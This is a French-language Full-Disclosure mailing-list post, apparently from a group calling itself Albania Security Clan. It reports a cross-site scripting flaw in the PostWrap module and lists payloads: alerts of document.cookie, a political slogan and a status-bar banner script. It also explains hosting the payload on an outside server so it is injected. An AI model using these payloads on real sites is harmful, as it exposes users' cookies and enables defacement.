[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] XSS VULNERABILITY AT MODULE PostWrap



<html><div style='background-color:'><DIV class=RTE>Bonjour, Albania Security Clan vient de découvrir une vulnebalirité de type XSS dans le module PostWrap le problem est au niveu de /index.php?module=PostWrap&amp;page=http://hostename.com/HACK/asc/ascmd.txt c n'est po une php injection parce que c'est protégé mais on peux injecter des comandes XSS, du javascript regardez plutot:</DIV>
<DIV class=RTE>ceci est un exemple de code qu'on peux injecter,</DIV>
<DIV class=RTE>&lt;script&gt;alert("COOKIE and HOSTNAME")&lt;/script&gt;<BR>&lt;script&gt;alert(document.cookie)&lt;/script&gt;<BR>&lt;script&gt;alert(document.hostname)&lt;/script&gt;<BR>&lt;script&gt;alert("Long LIVE Ethnic ALBANIA")&lt;/script&gt;<BR>&lt;SCRIPT language=JavaScript&gt;<BR>&lt;!--<BR>/* status */</DIV>
<DIV class=RTE>&nbsp; function one()<BR>&nbsp;&nbsp;&nbsp; {window.status = ".-*'^'*-.,_,.-*'^'*-[&nbsp;&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; - ]=[&gt; ALBANIA SECURITY CLAN XXS VULNERABILITY AT MODULE PostWrap &lt;]=[&nbsp;&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; - ]-*'^'*-.,_,.-*'^'*-.&nbsp; ";<BR>&nbsp;&nbsp;&nbsp; setTimeout("two()",60);<BR>&nbsp;&nbsp;&nbsp; }<BR>&nbsp; function two()<BR>&nbsp;&nbsp;&nbsp; {window.status = ".-*'^'*-.,_,.-*'^'*-[&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; ]=[&gt; ALBANIA SECURITY CLAN XXS VULNERABILITY AT MODULE PostWrap &lt;]=[&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; ]-*'^'*-.,_,.-*'^'*-.&nbsp; ";<BR>&nbsp;&nbsp;&nbsp; setTimeout("three()",120);<BR>&nbsp;&nbsp;&nbsp; }<BR>&nbsp; function three()<BR>&nbsp;&nbsp;&nbsp; {window.status = ".-*'^'*-.,_,.-*'^'*-[ -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp;&nbsp; ]=[&gt; ALBANIA SECURITY CLAN XSS VULNERABILITY AT MODULE PostWrap &lt;]=[ -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp; -&nbsp;&nbsp; ]-*'^'*-.,_,.-*'^'*-.&nbsp; ";<BR>&nbsp;&nbsp;&nbsp; setTimeout("one()",180);<BR>&nbsp;&nbsp;&nbsp; }<BR>&nbsp; one();<BR>// --&gt;<BR>&lt;/SCRIPT&gt;</DIV>
<DIV class=RTE>puis vous mettez ce code source dans un fichier .txt et vous l'uploader sur un site web (server) pour povoire l'injecter.</DIV>
<DIV class=RTE>Meilleurs Salutations d'Albanie.</DIV>
<DIV class=RTE><A href="http://www.albanianhaxorz.org";>www.albanianhaxorz.org</A> | irc.gigachat.net #ASC</DIV></div><br clear=all><hr>MSN Actions Solidaires <a href="http://g.msn.com/8HMAFRFR/2734??PS=47575"; target="_top">: partez comme volontaire à l'étranger</a> </html>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html